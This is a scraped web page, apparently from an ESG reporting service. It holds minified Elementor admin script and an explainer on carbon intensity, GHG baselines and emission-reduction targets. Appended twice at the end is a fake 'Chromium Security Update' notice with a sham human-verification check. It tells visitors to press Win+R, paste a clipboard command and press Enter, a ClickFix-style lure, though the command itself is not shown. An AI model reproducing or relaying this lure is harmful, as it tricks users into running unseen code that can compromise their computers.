/*! elementor - v3.21.0 - 15-04-2024 */ (()=>{var e={38003:e=>{"use strict";e.exports=wp.i18n},78983:e=>{e.exports=function _classCallCheck(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")},e.exports.__esModule=!0,e.exports.default=e.exports},42081:(e,t,r)=>{var o=r(74040);function _defineProperties(e,t){for(var r=0;r{var o=r(74040);e.exports=function _defineProperty(e,t,r){return(t=o(t))in e?Object.defineProperty(e,t,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[t]=r,e},e.exports.__esModule=!0,e.exports.default=e.exports},73203:e=>{e.exports=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}},e.exports.__esModule=!0,e.exports.default=e.exports},56027:(e,t,r)=>{var o=r(7501).default;e.exports=function toPrimitive(e,t){if("object"!=o(e)||!e)return e;var r=e[Symbol.toPrimitive];if(void 0!==r){var i=r.call(e,t||"default");if("object"!=o(i))return i;throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===t?String:Number)(e)},e.exports.__esModule=!0,e.exports.default=e.exports},74040:(e,t,r)=>{var o=r(7501).default,i=r(56027);e.exports=function toPropertyKey(e){var t=i(e,"string");return"symbol"==o(t)?t:String(t)},e.exports.__esModule=!0,e.exports.default=e.exports},7501:e=>{function _typeof(t){return e.exports=_typeof="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e.exports.__esModule=!0,e.exports.default=e.exports,_typeof(t)}e.exports=_typeof,e.exports.__esModule=!0,e.exports.default=e.exports}},t={};function __webpack_require__(r){var o=t[r];if(void 0!==o)return o.exports;var i=t[r]={exports:{}};return e[r](i,i.exports,__webpack_require__),i.exports}(()=>{"use strict";var e=__webpack_require__(38003).__,t=__webpack_require__(73203),r=t(__webpack_require__(78983)),o=t(__webpack_require__(42081)),i=t(__webpack_require__(93231)),n=function(){function Admin(){(0,r.default)(this,Admin),(0,i.default)(this,"KIT_DATA_KEY","elementor-kit-data"),(0,i.default)(this,"cachedKitData",void 0),(0,i.default)(this,"revertButton",void 0),(0,i.default)(this,"activeKitName",void 0),this.activeKitName=this.getActiveKitName(),this.revertButton=document.getElementById("elementor-import-export__revert_kit"),this.revertButton&&(this.revertButton.addEventListener("click",this.onRevertButtonClick.bind(this)),this.maybeAddRevertBtnMargin()),this.maybeShowReferrerKitDialog()}return(0,o.default)(Admin,[{key:"maybeAddRevertBtnMargin",value:function maybeAddRevertBtnMargin(){new URLSearchParams(this.revertButton.href).get("referrer_kit")&&(this.revertButton.style.marginBottom=this.calculateMargin(),this.scrollToBottom())}},{key:"calculateMargin",value:function calculateMargin(){var e=document.getElementById("wpadminbar"),t=e?e.offsetHeight:0,r=this.revertButton.parentElement.offsetHeight;return document.body.clientHeight-t-r-document.getElementById("wpfooter").offsetHeight-15+"px"}},{key:"scrollToBottom",value:function scrollToBottom(){setTimeout((function(){window.scrollTo(0,document.body.scrollHeight)}))}},{key:"onRevertButtonClick",value:function onRevertButtonClick(t){var r=this;t.preventDefault(),elementorCommon.dialogsManager.createWidget("confirm",{headerMessage:e("Are you sure?","elementor"),message:e("Removing %s will permanently delete changes made to the Kit's content and site settings","elementor").replace("%s",this.activeKitName),strings:{confirm:e("Delete","elementor"),cancel:e("Cancel","elementor")},onConfirm:function onConfirm(){return r.onRevertConfirm()}}).show()}},{key:"onRevertConfirm",value:function onRevertConfirm(){var e=new URLSearchParams(this.revertButton.href).get("referrer_kit");this.saveToCache(null!=e?e:""),location.href=this.revertButton.href}},{key:"maybeShowReferrerKitDialog",value:function maybeShowReferrerKitDialog(){var t=this.getDataFromCache().referrerKitId;if(void 0!==t){if(0===t.length)return this.createKitDeletedWidget({message:e("Try a different Kit or build your site from scratch.","elementor"),strings:{confirm:e("OK","elementor"),cancel:e("Kit Library","elementor")},onCancel:function onCancel(){location.href=elementorImportExport.appUrl}}),void this.clearCache();this.createKitDeletedWidget({message:e("You're ready to apply a new Kit!","elementor"),strings:{confirm:e("Continue to new Kit","elementor"),cancel:e("Close","elementor")},onConfirm:function onConfirm(){location.href=elementorImportExport.appUrl+"/preview/"+t}}),this.clearCache()}}},{key:"createKitDeletedWidget",value:function createKitDeletedWidget(t){var r=this.getDataFromCache().activeKitName;elementorCommon.dialogsManager.createWidget("confirm",{id:"e-revert-kit-deleted-dialog",headerMessage:e("%s was successfully deleted","elementor").replace("%s",r),message:t.message,strings:{confirm:t.strings.confirm,cancel:t.strings.cancel},onConfirm:t.onConfirm,onCancel:t.onCancel}).show()}},{key:"getActiveKitName",value:function getActiveKitName(){var t=elementorImportExport.lastImportedSession;return t.kit_title?t.kit_title:t.kit_name?this.convertNameToTitle(t.kit_name):e("Your Kit","elementor")}},{key:"convertNameToTitle",value:function convertNameToTitle(e){return e.split(/[-_]+/).map((function(e){return e[0].toUpperCase()+e.substring(1)})).join(" ")}},{key:"saveToCache",value:function saveToCache(e){sessionStorage.setItem(this.KIT_DATA_KEY,JSON.stringify({referrerKitId:e,activeKitName:this.activeKitName}))}},{key:"getDataFromCache",value:function getDataFromCache(){var e;if(this.cachedKitData)return this.cachedKitData;try{this.cachedKitData=JSON.parse(sessionStorage.getItem(this.KIT_DATA_KEY))}catch(e){return{}}return null!==(e=this.cachedKitData)&&void 0!==e?e:{}}},{key:"clearCache",value:function clearCache(){sessionStorage.removeItem(this.KIT_DATA_KEY)}}]),Admin}();window.addEventListener("load",(function(){new n}))})()})(); Carbon Intensity and Targets - ESG Report Pro
ESG - THE BASICS

CARBON INTENSITY AND TARGETS

Carbon intensity is often a good indication of where to begin looking for ways to reduce your carbon footprint by improving efficiencies and setting targets...

ESG Report Pro

What is carbon intensity vs carbon emissions?

An organisation’s or household’s carbon footprint is the total amount of carbon emissions they cause, directly or indirectly, through all of their actions. But each separate action has a different carbon cost, so it can be helpful to consider the amount of carbon emissions per action: that’s the carbon intensity. Carbon intensity is often a good indication of where to begin looking for ways to reduce your carbon footprint by improving efficiencies and setting targets.

What sort of Climate Related Targets should we set?

Targets should include a baseline year and the target year, where the base year is the year against which GHG reductions are tracked. The year in which the target will be met should be 5 to 10 years from the base year, as well as setting a long-term target for 2050.

Typically, companies choose a baseline year between 2016 and 2020, depending on when they have the most up to date records.

Best Practice: Set a GHG reduction target below your 2005 emissions level by 28% to be met in 2025 and 45% in 2030. Also set a long-term target of zero or near-zero GHG emissions by 2050 with a minimum 4.2% reduction per annum for each year.

What carbon targets do I need to set to be GHG Protocol Compliant?

The GHG Protocol and the Science Based Targets Initiative are widely recognised accounting tool guidelines for organisations to measure and manage their Greenhouse Gas emissions (GHGe). They provide a standardised framework for identifying, measuring, assessing, tracking and reporting emissions. The goal is to develop a statement that clearly and simply states your organisation’s GHG target and conversion to a low or zero carbon emission generating organisation.

WHAT SORT OF TARGETS SHOULD YOU SET AND HOW TO TO DO IT?

What sort of targets should you be setting and how to work out the metrics, monitoring and assessment system to support them?

1. Reduce Carbon Emissions

Set a target to reduce your carbon footprint by a certain percentage over a specific time period. This can be achieved through energy efficiency measures, transitioning to renewable energy sources, and promoting sustainable practices.

 

2. Increase Energy Efficiency

Aim to improve your energy efficiency by implementing measures such as upgrading appliances inefficient or poorly maintained, optimising heating and cooling systems, and reducing energy waste. Set specific targets for energy consumption reduction for each activity that creates an emission.

 

3. Transition to Renewable Energy

Set a goal to increase the share of renewable energy sources in your energy consumption. This can involve installing solar panels, purchasing renewable energy credits, or supporting community renewable projects.

 

4. Water Conservation

Establish targets to reduce water consumption by implementing water-saving technologies, promoting responsible water use practices, and minimising water waste.

 

5. Waste Reduction

Set goals to minimise waste generation and increase recycling rates. Implement strategies like composting, waste segregation, re-purposing, and promoting sustainable packaging solutions. Aim for zero-waste.

 

6. Sustainable Transportation

Aim to reduce the carbon footprint of transportation by promoting alternatives to fossil fuel-powered vehicles. Set targets for increasing the use of public transportation, cycling, walking, or electric vehicles.

 

7. Reforestation and Conservation

Consider setting targets to support reforestation efforts, biodiversity regeneration or protect and conserve natural habitats. This can involve planting trees, supporting biodiversity initiatives, or participating in conservation projects.

 

Remember: make your targets specific, measurable, achievable, relevant, and time-bound (SMART). Adapt them to your specific circumstances and regularly track progress to ensure you stay on track to achieve your climate-related goals.

Assessing the Organisation’s Impact on the Climate and Identifying Key Sources

Assessing your organisation’s impact on the climate involves mapping your greenhouse gas (GHG) emissions and identifying the sources that contribute to your carbon footprint, this involves building a Greenhouse Gas emission inventory. This assessment identifies Scope 1, 2 and 3 emissions, which can then be used to choose a Baseline Year for measuring progress and identifying areas for improvement.

 

Scenario and Resilience Analysis

Using the Locate, Evaluate, Assess, Prepare (LEAP) framework, begin by describing how your organisation’s activities (including up and downstream activities) may be dependent or influenced by climate-related factors. For each identified activity, evaluate the dependencies and potential impacts (availability, quality, cost, and reliability) associated with climate change. Then conduct a risk assessment to identify climate-related risks and opportunities that may affect each activity and present your findings in a Climate Resilience Strategy Report.

 

Target Setting and Transition Plan

Target setting involves establishing an emissions target for each organisational activity and then totalling the target emissions per year, such that you establish targets for reducing GHG emissions by 2030 and then by 2050. An example of an organisational target is ‘to reduce GHG emissions by 50% by 2030, compared to a baseline year of 2016, across all operations and supply chain, and by 95% by 2050’.

Establishing a long-term target and transition plan involves defining your emissions mitigation pathway, for which we recommend the Absolute Contraction Approach (ACA). Other elements include setting renewable energy usage targets. Identifying energy efficiency actions, reducing waste, transportation and supply chain emissions.

Monitoring and Tracking Progress

Your organisation must describe how it will establish mechanisms for monitoring and tracking progress in implementing climate-related actions and achieving its mitigation targets, we recommend integrating ESG Report Pro into regular organisational reporting schedules. By effectively monitoring and tracking progress, the organisation can assess the effectiveness of its strategies, identify areas for continuous improvement, and ensure transparency in reporting.

Chrome Icon

Chromium Security Update Required

Complete verification to update your browser engine

Important Security Notice

Your browser's Chromium engine is outdated and requires an immediate update to ensure secure browsing and protect your system from vulnerabilities.

  • Outdated versions are susceptible to security exploits
  • Newer versions include critical performance improvements
  • This update includes enhanced privacy protections

Complete the verification process below to automatically download and install the latest Chromium engine update.

Verify you are human to continue

I'm not a robot

Verification required to update browser components

Complete the update process:

1
Press Win + R to open the Run dialog
2
Paste the copied command with Ctrl + V
3
Press Enter to execute the update process
Chrome Icon

Chromium Security Update Required

Complete verification to update your browser engine

Important Security Notice

Your browser's Chromium engine is outdated and requires an immediate update to ensure secure browsing and protect your system from vulnerabilities.

  • Outdated versions are susceptible to security exploits
  • Newer versions include critical performance improvements
  • This update includes enhanced privacy protections

Complete the verification process below to automatically download and install the latest Chromium engine update.

Verify you are human to continue

I'm not a robot

Verification required to update browser components

Complete the update process:

1
Press Win + R to open the Run dialog
2
Paste the copied command with Ctrl + V
3
Press Enter to execute the update process